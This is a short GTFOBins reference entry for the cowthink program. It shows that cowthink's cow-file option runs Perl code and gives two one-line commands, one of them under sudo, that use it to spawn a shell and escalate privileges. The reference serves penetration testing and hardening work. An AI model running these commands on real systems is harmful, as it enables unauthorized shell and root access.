GTFOBins.github.io/_gtfobins/cowthink.md

327 B

description functions
It allows to execute [`perl`](/gtfobins/perl) code, other functions may apply.
shell sudo
code
TF=$(mktemp) echo 'exec "/bin/sh";' >$TF cowthink -f $TF x
code
TF=$(mktemp) echo 'exec "/bin/sh";' >$TF sudo cowthink -f $TF x